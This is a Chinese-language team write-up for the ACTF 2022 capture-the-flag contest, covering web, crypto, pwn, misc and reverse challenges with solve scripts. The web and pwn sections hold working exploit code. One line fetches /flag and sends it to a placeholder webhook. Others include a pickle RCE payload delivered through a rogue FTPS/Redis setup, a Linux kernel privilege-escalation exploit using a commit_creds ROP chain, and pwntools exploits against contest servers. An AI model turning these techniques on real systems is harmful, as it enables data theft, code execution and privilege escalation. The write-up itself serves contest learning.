ACTF

WEB

gogogo

照着p神博客一步一步打就行了
https://www.leavesongs.com/PENETRATION/goahead-en-injection-cve-2021-42342.html
最后反弹shell

beWhatYouWannaBe

flag1: 传url:
javascript:fetch("/flag").then(r=>navigator.sendBeacon('https://WEB_HOOK', r.text())) 直接csrf。
flag2: 用dom clobbering 构造fff.lll.aaaggg.value

<iframe name="fff" srcdoc='
    <form id="lll"></form>
    <form id="lll" name="aaa">
    <input name="ggg" value="this_is_what_i_want" />
  </form>'>
</iframe>

tolesion

TLS Poison攻击
通过FTPS协议来进行攻击
https://blog.zeddyu.info/2021/04/20/tls-poison/
用域名和证书起一个恶意的FTPs服务,让目标来请求,然后通过ftp的被动模式把payload转发到11200端口,写入pickle反序列化payload来进行rce

import socketserver, threading, requests, subprocess,time, base64, secrets,sys, hashlib, os
import redis, secrets, re
import pickle
class People(object):

    def __reduce__(self):
        cmd = f"/bin/bash -c 'touch /tmp/sussess'"
        cmds = f"cmd.exe /c calc.exe"
        # __reduce__ returns a tuple of callable and tuple of arguments of the callable
        return os.system, (cmd,)

a = People()
c = base64.b64encode(pickle.dumps(a))
f = open("/home/ubuntu/2.txt",'rb')

print(c)
b = base64.b64decode(c)
print(b)
le = str(len(b))
print(le)
r = redis.Redis(host='127.0.0.1', port=6379, db=0)
cmd =  b';/r*'
payload = b"\r\n\r\nset actfSession:b1e891e5-a183-4738-852c-237aca54671b "+ b"0 0 "+le.encode()+b" \r\n"+b+b"\r\n"
#payload = b"\r\n\r\nset actfSession:testesttest 0 0 2\r\nOK\r\n"
payload = b"\r\n\r\n"+f.read()

print('payload len: ', payload, file=sys.stderr)
r.set('payload', payload)
#!/usr/bin/env python3
import socketserver, threading,sys

class MyTCPHandler(socketserver.StreamRequestHandler):
    def handle(self):
        print('[+] connected', self.request, file=sys.stderr)
        self.request.sendall(b'220 (vsFTPd 3.0.3)\r\n')

        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr,flush=True)
        self.request.sendall(b'230 Login successful.\r\n')

        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'200 yolo\r\n')

        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'200 yolo\r\n')

        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'257 "/" is the current directory\r\n')

        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,192)\r\n')

        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,192)\r\n')

        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'200 Switching to Binary mode.\r\n')

        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'125 Data connection already open. Transfer starting.\r\n')

        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        # 226 Transfer complete.
        self.request.sendall(b'250 Requested file action okay, completed.')
        exit()

def ftp_worker():
    with socketserver.TCPServer(('0.0.0.0', 2048), MyTCPHandler) as server:
        while True:
            server.handle_request()
threading.Thread(target=ftp_worker).start()

Crypto

RSA LEAK

from Crypto.Util.number import *
import random
from gmpy2 import next_prime, iroot

# n = 122146249659110799196678177080657779971
# l = 90846368443479079691227824315092288065
# l = (l - 0xdeadbeef) % n
# dic = []
# for i in range(1, 1 << 24):
#     dic.append(pow(i, 65537, n))
# dic = set(dic)
# print('OK')
# for i in range(1, 1 << 24):
#     tmp = (l - pow(i, 65537, n)) % n
#     try:
#         if tmp in dic:
#             print(i, tmp)
#     except:
#         continue
n = 3183573836769699313763043722513486503160533089470716348487649113450828830224151824106050562868640291712433283679799855890306945562430572137128269318944453041825476154913676849658599642113896525291798525533722805116041675462675732995881671359593602584751304602244415149859346875340361740775463623467503186824385780851920136368593725535779854726168687179051303851797111239451264183276544616736820298054063232641359775128753071340474714720534858295660426278356630743758247422916519687362426114443660989774519751234591819547129288719863041972824405872212208118093577184659446552017086531002340663509215501866212294702743
e = 65537
c = 48433948078708266558408900822131846839473472350405274958254566291017137879542806238459456400958349315245447486509633749276746053786868315163583443030289607980449076267295483248068122553237802668045588106193692102901936355277693449867608379899254200590252441986645643511838233803828204450622023993363140246583650322952060860867801081687288233255776380790653361695125971596448862744165007007840033270102756536056501059098523990991260352123691349393725158028931174218091973919457078350257978338294099849690514328273829474324145569140386584429042884336459789499705672633475010234403132893629856284982320249119974872840

rp = 405771
rq = 11974933
t = iroot(n, 4)[0]
x = (-pow(t, 4) - rp * rq + n + iroot(pow(-pow(t, 4) - rp * rq + n, 2) - 4 * rp * rq * pow(t, 4), 2)[0]) // (2 * rq)
print(n % (x + rp))
p = x + rp
q = n // p
d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)
print(long_to_bytes(m))

impossible RSA

from Crypto.Util.number import *
from gmpy2 import iroot

n = 15987576139341888788648863000534417640300610310400667285095951525208145689364599119023071414036901060746667790322978452082156680245315967027826237720608915093109552001033660867808508307569531484090109429319369422352192782126107818889717133951923616077943884651989622345435505428708807799081267551724239052569147921746342232280621533501263115148844736900422712305937266228809533549134349607212400851092005281865296850991469375578815615235030857047620950536534729591359236290249610371406300791107442098796128895918697534590865459421439398361818591924211607651747970679849262467894774012617335352887745475509155575074809
e = 65537
for i in range(1, 65537):
    if iroot(1 + 4 * i * e * n, 2)[1]:
        if n % ((iroot(1 + 4 * i * e * n, 2)[0] - 1) // (2 * i)) == 0:
            p = (iroot(1 + 4 * i * e * n, 2)[0] - 1) // (2 * i)
            print(p)
q = inverse(e, p)
print(p * q == n)
flag = open('flag', 'rb').read()
flag = bytes_to_long(flag)
d = inverse(e, (p - 1) * (q - 1))
print(long_to_bytes(pow(flag, d, n)))

Pwn

mykvm

from pwn import*
context(os="linux",arch="amd64",log_level='debug')

libc=ELF("./libc-2.23.so")

while (True):
    flag=0
    r=remote("20.247.110.192",10888)
    #r=remote("127.0.0.1",6666)
    #r=process('./main')

    code=asm("""
            .code16
            mov bx,0x8
            mov ax,0x3F
            mov ds,ax
            mov ax,0x710
            mov ss,ax
            lable:
                mov al,byte ptr ds:[bx]
                out 0,al
                add bx,1
                cmp bx,0x200
                jna lable

            xor bx,bx
            mov al,0x0B
            mov ss:[bx+0x0],al
            mov al,0x20
            mov ss:[bx+0x1],al
            mov al,0x60
            mov ss:[bx+0x2],al
            mov al,0
            mov ss:[bx+0x3],al

            hlt
        """)

    r.recvuntil(": \n")
    r.sendline(str(0x1000))

    r.recvuntil(": \n")
    r.send(code)

    r.recvuntil(": ")
    r.sendline("a"*0x8)

    r.recvuntil(": ")

    r.sendline("b"*0x8)

    r.recvuntil("b"*0x8+"\n")
    sleep(0.1)
    libc_base=u64(r.recv(8))-0x8309d8
    success("libc_base: "+hex(libc_base))

    one_gadget=libc_base+0xf1247
    #gdb.attach(r,"b *0x400E49")
    test=one_gadget
    for i in range (3):
        char=test%0x100
        if (char>0x7e or char<0x20 ):
            flag=1
            break
        test=test//0x100
    if (flag==1):
        r.close()
        continue;
    else:
        pause()

    r.recvuntil("host name: ")
    r.sendline("a"*0x1D+p32(one_gadget%0x1000000)[:-1])

    r.interactive()

kkk

#include <stdio.h>
#include <fcntl.h>
#include <poll.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>
#include <signal.h>
#include <unistd.h>
#include <syscall.h>
#include <pthread.h>
#include <sys/shm.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <openssl/aes.h>
#include <openssl/evp.h>  
#include <openssl/bio.h>  
#include <openssl/buffer.h>
#include <openssl/md5.h>

struct request
{
    union
    {
        uint64_t idx;
        uint64_t type;
    };
    uint64_t key_size;
    char *key;
     uint64_t content_size;
    char *content;
};

int dev_fd;

char *recv_key;

uint64_t user_cs,user_ss,user_eflag,rsp;

void save_state()
{
    asm(
        "movq %%cs, %0;"
        "movq %%ss, %1;"
        "movq %%rsp, %3;"
        "pushfq;"
        "pop %2;"
        : "=r"(user_cs),"=r"(user_ss),"=r"(user_eflag),"=r"(rsp)
        :
        : "memory"
    );
}

void err(char *error)
{
    puts(error);
    exit(-1);
}

void new(uint64_t type, uint64_t key_size, char *key, uint64_t content_size, char *content)
{
    struct request request_t;
    int ret;

    memset(&request_t, 0, sizeof(struct request));
    request_t.type = type;
    request_t.key_size = key_size;
    request_t.key = key;
    request_t.content_size = content_size;
    request_t.content = content;

    ret = ioctl(dev_fd, 0x6B64, &request_t);

    if (ret) err("Error While New");
}

void edit(uint64_t idx, char *key, char *content)
{
    struct request request_t;
    int ret;

    memset(&request_t, 0, sizeof(struct request));
    request_t.idx = idx;
    request_t.key = key;
    request_t.content = content;

    ret = ioctl(dev_fd, 0x6B67, &request_t);

    if (ret) err("Error While Edit");
}

void show(uint64_t idx, char *key, char *content)
{
    struct request request_t;
    int ret;

    memset(&request_t, 0, sizeof(struct request));
    request_t.idx = idx;
    request_t.key = key;
    request_t.content = content;

    ret = ioctl(dev_fd, 0x6B69, &request_t);

    if (ret) err("Error While Show");
}

void encrypto(uint64_t idx)
{
    struct request request_t;
    int ret;

    memset(&request_t, 0, sizeof(struct request));
    request_t.idx = idx;

    ret = ioctl(dev_fd, 0x6B6B, &request_t);

    if (ret) err("Error While Encrypto");
}

void delete(uint64_t idx)
{
    struct request request_t;
    int ret;

    memset(&request_t, 0, sizeof(struct request));
    request_t.idx = idx;

    ret = ioctl(dev_fd, 0x6B6D, &request_t);

    if (ret) err("Error While Delete");
}

void arbitrary_write(uint64_t addr, uint64_t content)
{
    uint64_t *eval = malloc(0x8);
    char *zero_page = malloc(0x400);    

    ((uint64_t *)recv_key)[0x7a] = 0x8;
    ((uint64_t *)recv_key)[0x7b] = addr;
    edit(1, recv_key, zero_page);

    eval[0] = content;
    edit(2, (char *)eval, zero_page);

    show(1, recv_key, zero_page);

    free(eval);
    free(zero_page);
}

uint64_t arbitrary_read(uint64_t addr)
{
    char *zero_page = malloc(0x400);    

    ((uint64_t *)recv_key)[0x7a] = 0x8;
    ((uint64_t *)recv_key)[0x7b] = addr;
    edit(1, recv_key, zero_page);

    uint64_t eval;
    show(2, (char *)&eval, zero_page);

    show(1, recv_key, zero_page);

    free(zero_page);

    return eval;
}

void get_shell()
{
    char buf[0x50];
    memset(buf, 0, 0x20);
    int fd = open("/flag", O_RDONLY);
    read(fd, buf, 0x20);
    puts(buf);

    _exit(0);
}

int main()
{
    save_state();

    dev_fd = open("/dev/kkk", O_RDWR);

    if (dev_fd <= 0) perror("Error While Open");

    char *key = malloc(0x1000); char *content = malloc(0x1000);
    char *recv_content = malloc(0x1000);

    recv_key = mmap((void *)0xA000000, 0x3000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);

    recv_key[0]='a';

    memset(key, 0, 0x1000);
    memset(content, 0, 0x1000);

    ((uint64_t *)content)[0] = 0x8b3207c19fd5207;
    ((uint64_t *)(content+0x3a0))[0] = 0x8b3207c19fd5207;
    ((uint64_t *)content)[0x1] = 0x28;

    ((uint64_t *)key)[0] = 0x17d9e6b8154f6c42;
    ((uint64_t *)key)[1] = 0x7e4dcabfe6696471;
    ((uint64_t *)key)[2] = 0x69dc751b40f32c5a;
    ((uint64_t *)key)[3] = 0x82e6efe9e0db73b0;

    new(3, 0x28, key, 0x3a8, content);
    new(3, 0x28, key, 0x3a8, content);
    new(3, 0x28, key, 0x3a8, content);
    new(3, 0x28, key, 0x3a8, content);

    encrypto(0);

    show(1, recv_key, recv_content);

    uint64_t heap_addr = ((uint64_t *)recv_key)[0x7b] - 0x30;
    uint64_t modprobe_base = ((uint64_t *)recv_key)[0x7f] - 0x130;

    printf("[+] heap_addr: 0x%lx\n", heap_addr);
    printf("[+] modprobe_base: 0x%lx\n", modprobe_base);

    ((uint64_t *)recv_key)[0x7b] = modprobe_base + 0x1188;

    edit(1, recv_key, content);

    show(2, recv_key, recv_content);
    uint64_t kernel_base = ((uint64_t *)recv_key)[0] - 0x2258e0;
    uint64_t modprobe_path = kernel_base + 0x1850fa0;
    uint64_t work_for_cpu_fn = kernel_base + 0x8de20;
    uint64_t commit_creds = kernel_base + 0x9bcf0;
    uint64_t prepare_kernel_cred = kernel_base + 0x9bf90;
    uint64_t poweroff_cmd = kernel_base + 0x18507e0;
    uint64_t poweroff_work_func = kernel_base + 0x9ce40;
    uint64_t set_rsp = kernel_base + 0x524e89;
    uint64_t init_task = kernel_base + 0x1814940;
    uint64_t pop_rdi = kernel_base + 0x1614;
    uint64_t pop4 = kernel_base + 0x18adb;
    uint64_t kpti_trampoline = kernel_base+ 0xe00e10;
    uint64_t swapgs = kernel_base + 0xc67240;
    uint64_t iretq = kernel_base + 0x2ae1b;

    printf("[+] kernel_base: 0x%lx\n", kernel_base);
    printf("[+] modprobe_path: 0x%lx\n", modprobe_path);
    printf("[+] work_for_cpu_fn: 0x%lx\n", work_for_cpu_fn);
    printf("[+] commit_creds: 0x%lx\n", commit_creds);
    printf("[+] prepare_kernel_cred: 0x%lx\n", prepare_kernel_cred);
    printf("[+] poweroff_cmd: 0x%lx\n", poweroff_cmd);
    printf("[+] kpti_trampoline: 0x%lx\n", kpti_trampoline + 22);
    printf("[+] poweroff_work_func: 0x%lx\n", poweroff_work_func);
    printf("[+] init_task: 0x%lx\n", init_task);

    arbitrary_write(heap_addr - 0x400, 0x800);

    arbitrary_write(heap_addr + 0x420, set_rsp);

    arbitrary_write(heap_addr + 0x428, work_for_cpu_fn);

    uint64_t *eval = malloc(0x100);
    char *zero_page = malloc(0x400);

    ((uint64_t *)recv_key)[0x7a] = 0x100;
    ((uint64_t *)recv_key)[0x7b] = heap_addr + 0x408;
    edit(1, recv_key, zero_page);

    memset(eval, 0x61, 0x100);
    eval[0] = pop4;
    eval[3] = set_rsp;
    eval[4] = work_for_cpu_fn;
    eval[5] = pop_rdi;
    eval[6] = 0;
    eval[7] = prepare_kernel_cred;
    eval[8] = commit_creds;
    eval[9] = kpti_trampoline + 22;
    eval[10] = 0;
    eval[11] = 0;
    eval[12] = (uint64_t)get_shell;
    eval[13] = user_cs;
    eval[14] = user_eflag;
    eval[15] = rsp;
    eval[16] = user_ss;

    edit(2, (char *)eval, zero_page);

    show(1, recv_key, zero_page);

    free(eval);
    free(zero_page);

    encrypto(3);
}

2048

from pwn import *
import os
context(os = "linux", arch = "aarch64", log_level = "debug")

#io = process("qemu-aarch64 -L ./ ./pwn", shell = True)

io = remote("124.70.166.38", "9999")
io.recvuntil("`")
cmd = io.recvuntil("`")[:-1]
os.system(cmd)

io.send(raw_input())

shellcode = asm('''
    add x0, x30, #20
    mov x1, xzr
    mov x2, xzr
    mov x8, #221
    svc 0
    .ascii "/bin/sh\\0"
''')

io.sendafter("Input your name: \n", b"winmt")

io.send("asasasasasasassasasasasasasaasasasasasasassasasasasasasadadasaasasassadsassssassadsasassassdasdadadadssasasaaadsaasasdsasdsaasdadassasasdssdsasasaaadassdsaasaadsaasssasdsaassassdsasassadsasdsasasdsssdsassassaasasdasasasadsaaadasadssssasadsasasaasasdsaassaasaaasasaaaaaaadasssdaasaaaadsasdsssadsssasadsaadsaadsdsasadassaasdssadsaasasasaasasadadsasasaassaasadsasaasasadsasadasaasasasasaadadadsasdssasdsdsssdsdaaasdsdsddssasassssdasssassaadasasasadasasassdsasssasssasssssdsssssssasadssdsdsasdsassaasaassddsaasasasasssdsassasdaassdassdssaasasssdsdssadassdassdasasadadasasdasdsasaadasdsassasdsadadssasdssssdassdsdsadsssassasssdsasassaassdsasdsadssasssdsaassadsasaasdssasdsssasasdsdsdsdaddsddddddasdssasssdasdsssadasasassaaasaaaassasaadssdsdsddadsdsaasdassasasdadsasddsasasdsddsssasdsdsdsssdsasassdsdssdsdsdsdsdddadsdasdsdsdsdsssdssdsddsdadadsdssddsdadasdssdddsasssdadssadssssdadsdssdssdsddssddsdsasdsdasdsasddsdssddsdasddsasassddsdsdsaasddsadsdssdsassasassdsdassasddssssadsdsdssddsdddddadsdsdsaaa")

gadget1_addr = 0x4020D8
gadget2_addr = 0x4020B8
shellcode_addr = 0x413070
read_got_addr = 0x412F98
payload = b'a'*0x28 + p64(gadget1_addr) + p64(0) + p64(gadget2_addr) + p64(0) + p64(1) + p64(read_got_addr) + p64(0) + p64(shellcode_addr) + p64(0x50) + p64(0) + p64(shellcode_addr) # ret2csu
io.sendafter("Do you want to continue playing? [y/n]: ", payload)
sleep(0.1)
io.send(shellcode)
io.interactive()

Misc

Mahjoong

​ 因为是打麻将所以猜测胡了就可以有flag,于是找到这一串ACTF 2022 Writeup by X1cT34m-小绿草信息安全实验室

写个脚本异或一下a和b就是flag

ACTF{y@kumAn_1s_incredl3le}

signin

​ 下载下来是一个不知道啥玩意的flag文件,file命令看一下发现是bzip2,于是使用bzip2 -d 去解压,里面又是一个xz文件。这样手动解包最后发现有五种压缩形式

bzip2
gzip
xz
lzma
zstd

于是写爆破脚本去爆破压缩类型并解压缩

import os
os.rename('flag','flag.gz')
os.system('gzip -d flag.gz')
os.rename('flag.gz','flag.bz')
os.system('bzip2 -d flag.bz')
os.rename('flag.bz','flag.xz')
os.system('xz -d flag.xz')
os.rename('flag.xz','flag.zstd')
os.system('zstd -d flag.zstd')
os.rename('flag.zstd','flag.lzma')
os.system('lzma -d flag.lzma')

最后写个循环一直解就可以拿到flag

ACTF{r0cK_4Nd_rolL_1n_C0mpr33s1ng_aNd_uNCOmrEs5iNg}

signoff

​ 问卷

Reverse

dropper

C++实现的大整数运算,从内存中拿出结果,然后用户z3解

from z3 import *

arr = [64584540291872516627894939590684951703479643371381420434698676192916126802789388,11783410410469738048283152171898507679537812634841032055361622989575562121323526, 55440851777679184418972581091796582321001517732868509947716453414109025036506793, 17867047589171477574847737912328753108849304549280205992204587760361310317983607, 7537302706582391238853817483600228733479333152488218477840149847189049516952787, 80793226935699295824618519685638809874579343342564712419235587177713165502121664, 14385283226689171523445844388769467232023411467394422980403729848631619308579599, 55079029772840138145785005601340325789675668817561045403173659223377346727295749, 71119332457202863671922045224905384620742912949065190274173724688764272313900465, 57705573952449699620072104055030025886984180500734382250587152417040141679598894]

res = 834572051814337070469744559761199605121805728622619480039894407167152612470842477813941120780374570205930952883661000998715107231695919001238818879944773516507366865633886966330912156402063735306303966193481658066437563587241718036562480496368592194719092339868512773222711600878782903109949779245500098606570248830570792028831133949440164219842871034275938433

s = Solver()
flag = BitVec('flag', 700)

my = ((((((((flag+arr[0])*arr[1]-arr[2])+arr[3])*arr[4])-arr[5])+arr[6])-arr[7])+arr[8])-arr[9]

s.add(my==res)
if s.check() ==sat:
    out = s.model()[flag].as_long()
    print(out)

解出来的结果转成二进制,7个字节为一组转换成字符就得到base64

import base64
out = 9396732749587903779982032223783704408363403648379534949744333952324860296757610447170361685759182747971458838316594664099958866750753425972637962724687099230310084662432348188439040968731452657169050321

out = '0' + bin(out)[2:]
flag = b""
for i in range(len(out), 0, -7):
    flag += int(out[i-7:i],2).to_bytes(1,'big')
print(base64.b64decode(flag))
b'ACTF{dr0pp3r_1s_v3ry_int3r3st1ng_1d7a90a63039831c7fcaa53b766d5b2d!!!!!}'